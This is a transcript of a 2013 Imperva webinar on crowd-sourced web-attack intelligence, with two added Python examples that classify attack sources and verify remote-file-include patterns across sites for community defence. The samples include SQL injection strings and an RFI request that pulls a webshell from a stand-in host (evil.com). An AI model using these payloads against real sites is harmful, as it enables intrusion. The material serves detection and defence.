The Value of Crowd-Sourced Threat Intelligence

On April 3, CNBC reported the details of a large-scale attack campaign targeting the banking industry. As a result of this campaign, multiple U.S. banks experienced website outages totaling 249 hours over a six-week period. Would the damage have been reduced if the banks had been able to share crowd-sourced threat intelligence? Imperva's Application Defense Center (ADC) recently analyzed real-world traffic from sixty Web applications to identify attack patterns. The results show how sharing attack patterns across a community of Web applications can significantly reduce the risk from large-scale attack campaigns. This presentation will: identify how cross-site information sharing (crowd-sourcing) creates security intelligence; demonstrate the value of adding crowd-sourced intelligence to Web application security; and provide real-world examples of attack patterns that can be shared for community defense.

  1. Crowd Sourced Threat Intelligence
     Amichai Shulman, CTO, Imperva. May 2013.
     © 2013 Imperva, Inc. All rights reserved.
  2. Agenda
     • Introduction to crowd sourcing and threat intelligence
     • Application layer threat intelligence
       - Research report
     • Actionable threat intelligence
       - Turning threat intelligence into community defense
     • Threat intelligence and legislation
       - Pros, cons and the current state of affairs
     • Summary and conclusions
     • Q&A
  3. Amichai Shulman – CTO, Imperva
     • Speaker at industry events: RSA, AppSec, Infosecurity UK, Black Hat
     • Lecturer on information security at the Technion (Israel Institute of Technology)
     • Former security consultant to banks and financial services firms
     • Leads the Application Defense Center (ADC)
       - Discovered over 20 commercial application vulnerabilities
       - Credited by Oracle, Microsoft SQL Server, IBM and others
     • One of InfoWorld's "Top 25 CTOs"
  4. HII Reports
     • The Hacker Intelligence Initiative (HII) focuses on understanding how attackers operate in practice
       - A different approach from vulnerability research
     • Data set composition
       - ~60 real-world applications
       - Anonymous proxies
     • More than 24 months of data
     • Powerful analysis system
       - Combines analytic tools with drill-down capabilities
  5. Introduction: Crowd Sourcing and Threat Information Sharing
  6. What is Crowd Sourcing
     • "The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations" (James Surowiecki)
  7. Crowd Sourcing in Practice
     (image-only slide)
  8. Threat Information Sharing
     • AV vendor customers sharing suspicious files with their vendors
       - Manual process
       - If not manual, then how do you define "suspicious"?
     • Anti-spam vendors collecting email data from all deployments
       - Privacy?
       - Confidentiality?
     • Customer groups for sharing battle stories
       - Timely?
  9. Threat Intelligence
     • Infer NEW information about future attacks by looking at past attacks
     • Attacks across organizations share common characteristics
       - Sources
       - Techniques
       - Tools
       - Timelines
  10. Application Layer Threat Intelligence: Research Report
  11. Some Observations
     • Most web attacks are part of large-scale industrialized operations
       - Reuse of attack platforms
       - Reuse of techniques
       - Reuse of tools
     • Attack campaigns span meaningful time frames
  12. More Observations
     • Izz ad-Din al-Qassam Cyber Fighters attacks on US banks
       - Started with a few banks 4 months ago
       - Gradually added more targets to the list
     • #OpIsrael / #OpUSA / #OpColombia ...
       - Attacks by hacktivists
       - Targeted at a specific time frame
       - Pick many victims and hit them with the SAME exact tools over the attack time frame
  13. Methodology
     • Attack data only
       - 60 applications
       - 6 months of data
     • Analyze dominant attack types
       - SQL Injection
       - Remote File Include
       - Comment Spam
       - Local File Include
       - Directory Traversal
  14. SQL Injection – Source Threat Quadrant
     Sources are placed by how many targets they hit and how long they stay active, giving four quadrants:
     • Multi-target, persistent sources
     • Multi-target sources
     • Persistent sources
     • Singletons
  15. SQL Injection – Source Threat Quadrant
     (same chart, highlighting the multi-target, persistent sources)
  16. SQL Injection – Time Perspective
     [Chart: number of SQL injection targets per day, 1 January to 28 February 2013 (y-axis 0 to 18); two series: Accumulating and Current targets]
  17. Comment Spam – Source Threat Quadrant
     (highlighting the multi-target, persistent sources)
  18. Remote File Include – URL Threat Quadrant
     (highlighting the multi-target, persistent vectors)
  19. Remote File Include – Example
     • Reconnaissance campaign based on a benign URL
       - http://google.com/humans.txt
     • 11 different applications targeted using the same URL
       - 5,144 different requests
     • Spread throughout an entire month
     • Next slide shows a network graph of attack sources to targets
       - We can learn about the relationships between attack sources
  20. Remote File Include – Example
     (network graph of attack sources to targets; image-only slide)
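The two quadrants on slides 14 to 18 and the cross-application RFI campaign on slide 19 are the same computation applied to two keys: score each attack source (or each attack vector) by how many distinct applications it hit and on how many distinct days it was active, and share the ones that land in the multi-target, persistent corner. The following is an added example, not the deck's or Imperva's analysis code; the WAF event sample, the documentation-range IP addresses and the two thresholds are constructed assumptions. It also reproduces the "current versus accumulating targets" view from slide 16.

```python
"""Threat-quadrant classification of attack sources and attack vectors.

Added example (not Imperva's HII analysis code). A source or vector is scored on
two axes: how many distinct applications it hit and on how many distinct days it
was active. Thresholds and the event sample below are assumptions.
"""
from collections import defaultdict
from datetime import date

# Constructed WAF attack events: (source_ip, target_app, day, attack_type, vector).
# Sources use RFC 5737 documentation addresses.
EVENTS = [
    ("198.51.100.7", "bank-a",   date(2013, 1, 2),  "sqli", "' OR 1=1--"),
    ("198.51.100.7", "bank-b",   date(2013, 1, 9),  "sqli", "' OR 1=1--"),
    ("198.51.100.7", "retail-c", date(2013, 1, 30), "sqli", "' UNION SELECT NULL--"),
    ("203.0.113.5",  "bank-a",   date(2013, 1, 2),  "sqli", "' OR 1=1--"),
    ("203.0.113.5",  "bank-a",   date(2013, 1, 3),  "sqli", "' OR 1=1--"),
    ("203.0.113.5",  "bank-a",   date(2013, 1, 15), "sqli", "' OR 1=1--"),
    ("192.0.2.9",    "bank-a",   date(2013, 1, 4),  "sqli", "' OR 1=1--"),
    ("192.0.2.9",    "bank-b",   date(2013, 1, 4),  "sqli", "' OR 1=1--"),
    ("192.0.2.9",    "retail-c", date(2013, 1, 4),  "sqli", "' OR 1=1--"),
    ("192.0.2.44",   "retail-c", date(2013, 1, 20), "sqli", "1; DROP TABLE x--"),
    # RFI reconnaissance with a benign URL, spread over applications and weeks
    ("198.51.100.7", "bank-a",   date(2013, 2, 1),  "rfi", "http://google.com/humans.txt"),
    ("192.0.2.9",    "bank-b",   date(2013, 2, 10), "rfi", "http://google.com/humans.txt"),
    ("203.0.113.80", "retail-c", date(2013, 2, 25), "rfi", "http://google.com/humans.txt"),
    ("203.0.113.80", "retail-c", date(2013, 2, 26), "rfi", "http://evil.example/shell.txt"),
]

MULTI_TARGET_MIN = 2     # distinct applications needed to count as multi-target (assumed)
PERSISTENT_MIN_DAYS = 2  # distinct active days needed to count as persistent (assumed)


def quadrant(n_targets, n_days):
    """Map (distinct targets, distinct active days) to one of the four quadrant labels."""
    multi = n_targets >= MULTI_TARGET_MIN
    persistent = n_days >= PERSISTENT_MIN_DAYS
    if multi and persistent:
        return "multi-target persistent"
    if multi:
        return "multi-target"
    if persistent:
        return "persistent"
    return "singleton"


def _classify(events, key_index, attack_type):
    """Quadrant classification keyed on source (index 0) or vector (index 4)."""
    targets = defaultdict(set)
    days = defaultdict(set)
    for ev in events:
        if attack_type is not None and ev[3] != attack_type:
            continue
        key = ev[key_index]
        targets[key].add(ev[1])
        days[key].add(ev[2])
    return {k: quadrant(len(targets[k]), len(days[k])) for k in targets}


def classify_sources(events, attack_type=None):
    """Source threat quadrant: one label per attacking IP."""
    return _classify(events, 0, attack_type)


def classify_vectors(events, attack_type=None):
    """URL/vector threat quadrant: one label per payload or included URL."""
    return _classify(events, 4, attack_type)


def community_candidates(classes):
    """Entries worth sharing with the whole community: the multi-target, persistent corner."""
    return sorted(k for k, label in classes.items() if label == "multi-target persistent")


def target_timeline(events, attack_type):
    """Per active day: (distinct targets hit that day, distinct targets hit so far),
    i.e. the 'current' and 'accumulating' series of the time-perspective chart."""
    per_day = defaultdict(set)
    for _, app, day, kind, _ in events:
        if kind == attack_type:
            per_day[day].add(app)
    seen, timeline = set(), []
    for day in sorted(per_day):
        seen |= per_day[day]
        timeline.append((day, len(per_day[day]), len(seen)))
    return timeline


if __name__ == "__main__":
    for src, label in sorted(classify_sources(EVENTS, "sqli").items()):
        print(f"SQLi source {src:14} {label}")
    for vec, label in classify_vectors(EVENTS, "rfi").items():
        print(f"RFI vector  {vec:30} {label}")
    print("share:", community_candidates(classify_sources(EVENTS, "sqli")),
          community_candidates(classify_vectors(EVENTS, "rfi")))
    for day, current, accumulated in target_timeline(EVENTS, "sqli"):
        print(day, "current", current, "accumulating", accumulated)
```

Note that the singleton source 192.0.2.44 and the one-off `http://evil.example/shell.txt` vector are the ones a single site would see and act on alone; only the cross-site view exposes 198.51.100.7 and the humans.txt vector as campaign infrastructure.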
  21. Use of Attack Tools
     [Chart: percentage of automated attacks per attack type, 0% to 100%, for RFI, LFI, SQLi, Comment Spam, XSS and DT (directory traversal); series: Total Attacks, Automated]
  22. Actionable Threat Intelligence: Turning Threat Intelligence Into Community Defense
  23. Actionable Intelligence Life Cycle
     Known attack patterns → apply on traffic to identify attackers → known attackers → apply on traffic to identify new patterns → (back to known attack patterns)
  24. Actionable Threat Intelligence
     • Multiphase
       - Distributed data collection
       - Information extraction
       - Analysis and knowledge generation
       - Knowledge validation
       - Distribution of knowledge to devices
     • The cycle must be completely automated to provide value in a timely manner and at scale
       - Not an information sharing hub
  25. The Cost of Decision Making
     • Problem scale is increasing
       - Number of attacks is constantly growing
       - Number of applications per organization is growing
     • Resources are stagnant
       - No additional headcount
     • Organizations must reduce the proportion of alerts that require human decision making
     • By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection for a larger portion of the attacks
  26. Threat Intelligence and Legislation: Pros, Cons and the Current State of Affairs
  27. Current Legislation
     • US Cyber Intelligence Sharing and Protection Act (CISPA)
       - Passed the House of Representatives in April 2013
       - Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities
       - Addresses issues of eligibility, liability and protection of shared information
  28. Current Legislation
     • UK Cyber Security Information Sharing Partnership (CISP)
       - Launched late March 2013 (piloted through 2012)
       - Sets up procedural and technical grounds for information sharing between the private sector and government
       - Comprises an operations room, a reporting portal and program definitions
       - A similar program exists for cyber crime (CCRP)
  29. Cons
     • Misuse of information by governments
       - Invade privacy in various ways
       - Would otherwise require a court order
     • Information sharing platform
       - Does not provide for extraction of actionable intelligence
     • Governments usually do things the wrong way
       - E.g. the complexity of the STIX language
  30. Pros
     • Regulate how data is anonymized and protected
     • Encourage more organizations to take part in this effort
       - Achieve better results faster
       - Reduce overall damage to the public
     • Standardize on various components
  31. Summary & Conclusions
  32. Summary
     • Threat intelligence has a measurable potential value for Web application attacks
     • Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools
     • Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence
       - Not information sharing hubs
       - No manual processes
     • Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
  33. ThreatRadar Community Defense
  34. ThreatRadar Community Defense
  35. ThreatRadar Community Defense
     • Gathers live attack data from SecureSphere WAFs around the world
     • Distributes attack patterns and reputation data in near-real time
  36. Community Defense – How It Works
     (diagram: User → Internet → Web Servers, with ThreatRadar Servers in the cloud)
     1. SecureSphere detects a possible RFI attack, e.g. a request for /vulnerable.php?C=http://evil.com/webshell.txt?
     2. Sends the event to the ThreatRadar cloud
     3. If ThreatRadar verifies that the site is malicious, it distributes the new RFI pattern to the community
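Slides 23 and 24 describe the loop (known patterns identify attackers, known attackers identify new patterns, everything validated and distributed without a human in the path), and slide 36 gives its RFI instance: a WAF sees a parameter whose value is an absolute URL, forwards the event, the shared service verifies the vector, and the verified pattern goes back to every member. The following is an added example of that cycle, not ThreatRadar or SecureSphere code. Because an offline example cannot fetch and inspect the remote file the way the real service does, verification here is corroboration: a pattern is trusted once at least `MIN_MEMBERS` different applications have reported it (assumed rule), or once a source already known as an attacker uses it. Member names, request samples and IP addresses are constructed.

```python
"""Community defense cycle for remote file include (RFI) events.

Added example, not Imperva's ThreatRadar or SecureSphere code. It models the
three steps of the "how it works" slide and the actionable-intelligence loop.
Verification is corroboration across members (assumed rule), not a fetch of the
remote file. Members, requests and IP addresses below are constructed.
"""
from urllib.parse import parse_qsl, unquote, urlsplit

REMOTE_SCHEMES = ("http", "https", "ftp")  # PHP stream wrappers (php://, data:) are out of scope


def extract_rfi_vectors(request_target):
    """Absolute URLs found in query-parameter values of a request target, e.g.
    '/vulnerable.php?C=http://evil.com/webshell.txt?' -> ['http://evil.com/webshell.txt?']."""
    found = []
    for _, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        candidate = unquote(value).strip()
        parts = urlsplit(candidate)
        if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            found.append(candidate)
    return found


def normalize_pattern(url):
    """Shareable pattern: scheme://host/path, dropping the trailing '?' (or query)
    attackers append so that whatever the vulnerable code concatenates is ignored."""
    parts = urlsplit(url)
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}{parts.path or '/'}"


class CommunityDefense:
    """The shared service: collects sightings, verifies, distributes."""

    def __init__(self, min_members=2):
        self.min_members = min_members
        self.members_seen = {}    # pattern -> set of member apps that reported it
        self.sources_seen = {}    # pattern -> set of source IPs that used it
        self.verified = set()     # patterns distributed to the community
        self.known_attackers = set()

    def report(self, member, source_ip, request_target):
        """Step 2: a member forwards a possible RFI. Returns patterns this report verified."""
        newly_verified = []
        for url in extract_rfi_vectors(request_target):
            pattern = normalize_pattern(url)
            self.members_seen.setdefault(pattern, set()).add(member)
            self.sources_seen.setdefault(pattern, set()).add(source_ip)
            corroborated = len(self.members_seen[pattern]) >= self.min_members
            # second half of the loop: a known attacker's new vector is trusted at once
            attributed = source_ip in self.known_attackers
            if pattern not in self.verified and (corroborated or attributed):
                self.verified.add(pattern)
                newly_verified.append(pattern)
            if pattern in self.verified:
                # first half of the loop: a verified pattern identifies attackers,
                # including sources that used it before it was verified
                self.known_attackers |= self.sources_seen[pattern]
        return newly_verified

    def feed(self):
        """Step 3: what is pushed to every member."""
        return {"patterns": sorted(self.verified), "attackers": sorted(self.known_attackers)}


def member_blocks(feed, source_ip, request_target):
    """Member-side decision using only the distributed feed, no human in the loop."""
    if source_ip in feed["attackers"]:
        return "blocked: known attacker"
    for url in extract_rfi_vectors(request_target):
        if normalize_pattern(url) in feed["patterns"]:
            return "blocked: known RFI pattern"
    return "allowed"


def run_demo():
    """Constructed sequence of reports from three member applications."""
    svc = CommunityDefense(min_members=2)
    steps = [
        ("bank-a",   "203.0.113.5",  "/vulnerable.php?C=http://evil.com/webshell.txt?"),
        ("retail-c", "198.51.100.7", "/index.php?page=http%3A%2F%2Fevil.com%2Fwebshell.txt%3F"),
        ("bank-b",   "203.0.113.5",  "/view.php?f=http://203.0.113.77/c99.txt?"),
        ("bank-b",   "192.0.2.9",    "/view.php?f=home"),
    ]
    log = [svc.report(*step) for step in steps]
    return svc, log


if __name__ == "__main__":
    svc, log = run_demo()
    for verified in log:
        print("newly verified:", verified)
    feed = svc.feed()
    print("feed:", feed)
    print(member_blocks(feed, "192.0.2.9", "/view.php?f=http://EVIL.com/webshell.txt"))
    print(member_blocks(feed, "203.0.113.5", "/view.php?f=home"))
    print(member_blocks(feed, "192.0.2.9", "/view.php?f=home"))
```

The first report alone verifies nothing; the second, from a different application, corroborates the same included URL, and both sources that used it become known attackers. The third report then shows the other direction of the loop: a never-seen URL from an already known attacker is promoted immediately. The benign humans.txt reconnaissance from slide 19 would be handled the same way, since the thing being shared is the vector, not a judgement about the file it points to.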
  37. Webinar Materials
     Join the Imperva LinkedIn group, Imperva Data Security Direct, for post-webinar discussions, answers to attendee questions and the webinar recording link.
  38. www.imperva.com